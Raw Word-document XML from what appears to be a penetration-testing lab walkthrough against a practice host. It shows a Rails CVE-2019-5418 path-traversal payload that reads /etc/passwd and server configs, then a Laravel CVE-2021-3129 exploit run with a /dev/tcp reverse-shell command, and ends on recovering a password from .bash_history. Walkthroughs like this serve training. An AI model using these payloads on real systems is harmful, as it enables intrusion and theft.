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BETA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7b88n3o5u7yb"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95400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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looking at the website running on port 80:</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57600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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inspecting the page source code, a commented route was identified in the HTML, referenced as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/chybeta"</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33700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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researching </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“chybeta ruby on rails”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, an association was identified with vulnerability </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-5418</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (File Content Disclosure in Rails). This vulnerability occurs in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Action View</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing the exposure of arbitrary file contents on the server. It is exploited through maliciously manipulated </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers in conjunction with calls to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">render file:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> method, enabling the rendering and disclosure of sensitive files on the target server.</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https://github.com/mpgn/CVE-2019-5418</w:t>
        </w:r>
      </w:hyperlink>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intercepting the request with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and sending it to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can manipulate the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> header to exploit a File Content Disclosure vulnerability (CVE-2019-5418) in the Ruby on Rails framework. The payload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../../../etc/passwd{{ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was used in the value of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> header in order to exploit improper file rendering and gain access to the contents of the sensitive file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on the target server.</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2667000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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reading several internal server files, no relevant information was initially identified. However, when accessing the configuration file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/httpd/conf/httpd.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it was possible to identify the existence of a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual Host</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> configured for the domain </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internal-app-secret.chybeta.labdepentest.com.br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which is associated with a Laravel application.</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5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add the identified domain to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file so it can be resolved. This is necessary to access the configured Virtual Host. The configuration in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> would look similar to the example below:</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76400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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configuring the domain in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can access the subdomain. From the application analysis, we determined that it uses the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Laravel framework version v8.81.0</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65500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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While investigating the Laravel version in use, we identified vulnerability </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-3129</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which affects Laravel versions up to 8.4.2.</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vulnerability allows unauthenticated attackers to execute arbitrary code remotely in applications that use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ignition</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> package in debug mode. The flaw is related to the insecure use of the functions </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file_get_contents()</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file_put_contents()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the Ignition package prior to version 2.5.2.</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hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.ambionics.io/blog/laravel-debug-rce</w:t>
        </w:r>
      </w:hyperlink>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download the exploit below to perform the exploitation:</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hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/0x0d3ad/CVE-2021-3129</w:t>
        </w:r>
      </w:hyperlink>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Additionally, we need to download </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpggc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create the gadget:</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hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ambionics/phpggc</w:t>
        </w:r>
      </w:hyperlink>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clone </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpggc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and then, inside the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpggc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory, download the corresponding exploit:</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git clone https://github.com/ambionics/phpggc.git</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phpggc</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wget https://raw.githubusercontent.com/0x0d3ad/CVE-2021-3129/refs/heads/main/CVE-2021-3129.py</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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="647700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>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1346200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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execute:</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CVE-2021-3129.py http://internal-app-secret.chybeta.labdepentest.com.br --cmd "/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1'"</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17600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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shell:</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57300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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vknbsqkkxyv8" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell tty</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65200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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home directory of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"beta"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.bash_history</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. By examining its contents, we are able to identify the password of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"beta"</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90900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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38200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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id </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we identify that the user belongs to the group </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lxd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
